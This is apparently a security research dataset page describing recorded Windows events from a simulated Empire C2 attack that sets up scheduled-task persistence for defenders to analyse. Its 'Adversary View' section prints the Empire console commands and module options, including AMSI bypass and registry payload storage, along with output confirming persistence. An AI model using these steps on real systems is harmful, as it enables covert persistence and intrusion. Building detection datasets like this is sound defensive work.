Empire Userland Scheduled Tasks
Contents
Empire Userland Scheduled Tasks#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/03/19 |
Modification Date |
2020/09/20 |
Tactics |
|
Techniques |
|
Tags |
Local Scheduled Tasks |
Dataset Description#
This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
Adversary View#
(Empire: stager/multi/launcher) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
A7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http
HBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http
UF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http
3MWPS8L6 ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 7312 5/0.0 2020-09-21 07:12:36 http
(Empire: agents) > interact 3MWPS8L6
(Empire: 3MWPS8L6) > usemodule persistence/userland/schtasks
(Empire: powershell/persistence/userland/schtasks) > info
Name: Invoke-Schtasks
Module: powershell/persistence/userland/schtasks
NeedsAdmin: False
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
Authors:
@mattifestation
@harmj0y
Description:
Persist a stager (or script) using schtasks. This has a
moderate detection/removal rating.
Comments:
https://github.com/mattifestation/PowerSploit/blob/master/Pe
rsistence/Persistence.psm1
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True 3MWPS8L6 Agent to run module on.
Listener False Listener to use.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
AMSIBypass False True Include mattifestation's AMSI Bypass in
the stager code.
AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in
the stager code.
DailyTime False 09:00 Daily time to trigger the script
(HH:mm).
IdleTime False User idle time (in minutes) to trigger
script.
TaskName True Updater Name to use for the schtask.
RegPath False HKCU:\Software\Microsoft Registry location to store the script
\Windows\CurrentVersion\ code. Last element is the key name.
debug
ADSPath False Alternate-data-stream location to store
the script code.
ExtFile False Use an external file for the payload
instead of a stager.
Cleanup False Switch. Cleanup the trigger and any
script from specified location.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/persistence/userland/schtasks) > set Listener http
(Empire: powershell/persistence/userland/schtasks) > set TaskName MordorSchtask
(Empire: powershell/persistence/userland/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 3MWPS8L6 to run TASK_CMD_WAIT
[*] Agent 3MWPS8L6 tasked with task ID 1
[*] Tasked agent 3MWPS8L6 to run module powershell/persistence/userland/schtasks
(Empire: powershell/persistence/userland/schtasks) >
SUCCESS: The scheduled task "MordorSchtask" has successfully been created.
Schtasks persistence established using listener http stored in HKCU:\Software\Microsoft\Windows\CurrentVersion\debug with MordorSchtask daily trigger at 09:00.
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_schtasks_creation_standard_user.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)